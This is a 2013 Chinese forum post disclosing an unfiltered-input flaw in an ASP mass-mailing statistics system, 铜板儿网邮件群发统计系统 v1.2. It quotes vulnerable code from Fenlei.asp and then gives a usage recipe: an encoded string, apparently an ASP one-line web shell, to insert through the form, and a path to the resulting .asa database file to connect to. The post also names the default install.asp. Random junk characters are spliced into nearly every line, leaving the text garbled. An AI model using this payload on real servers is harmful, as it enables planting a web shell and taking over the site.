找回密码
 立即注册
查看: 2556|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
4 k; K  w) ?, X- _8 M, t$ W4 s1 t: q; @
IF Request.QueryString("Action")="del" Then
$ i  S7 R$ n0 Q* q* g) RID=Request.QueryString("ID")
' }1 h" R: B" n! w/ F( }8 ]& pIF Countss ("tui","Fenlei",ID )<>0 then
+ t( W2 {* H) @# B'略
3 S& F8 ~  b, Z% v; w/ o; [# H/ EIF Request.QueryString("Action")="Add" Then
  T" G1 [5 Y) CTname=Request.Form("Typename") , |( ]1 {- ]2 K; t+ q& L! Y- _/ G
Set Rs=Server.CreateObject("adodb.Recordset") " s5 b4 `/ L: S6 C! ^! Y
Sql="Select * From Fenlei Order by id Desc "
3 I! w* L* m' S; u. R0 w1 W8 O" oRs.Open Sql,Conn,1,3
" J" d9 Q6 ]# U$ MRs.Addnew
0 q# N- T/ \( Z1 a. C' K8 ?Rs("Typename")=Tname
: B! x9 g! j1 D$ a. e'略 3 m4 S$ v3 G- d: f8 l) W
Set Rs=Server.CreateObject("adodb.Recordset") ; l* F* I* z( f  q5 \
Sql="Select * From Fenlei Order by id Desc " 1 e6 o3 c5 l' \, f1 `
Rs.Open Sql,Conn,1,1
% p7 m0 ^5 `5 f2 M) ~5 \& `$ [$ F& E'略
& r( d! O2 F, a( K9 S: l, o%>& i7 J3 Q( U5 F9 u6 ^# ^' e
; U, s9 b# P2 y9 R3 ^0 l

* A7 K; ^& I: _- u( m3 t) l / ?8 g' g' t- J
没有过滤,直接写入数据库。
6 S, `  u; _$ J5 \( w" I
& D5 F- E( B* m1 ]7 l" u6 r8 C2 q利用方法:) Z) A+ v& b  t1 O+ N! }4 r

, W  f, [  Q, z: L+ {6 z插入:┼攠數畣整爠煥敵瑳∨≡┩>
( |- M$ Y0 s. T! j6 z
+ f, d; O. `  I/ t0 r4 i) a
, B0 w3 u) P- ~连接: http://www.xxx.com/###tongbaner.asa
5 T  N6 N) I# A5 r0 m1 }'默认安装文件: 2 F7 ?5 e! p) E/ P) p
'install.asp
$ z6 l' v, {# Y$ `, U; t, c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表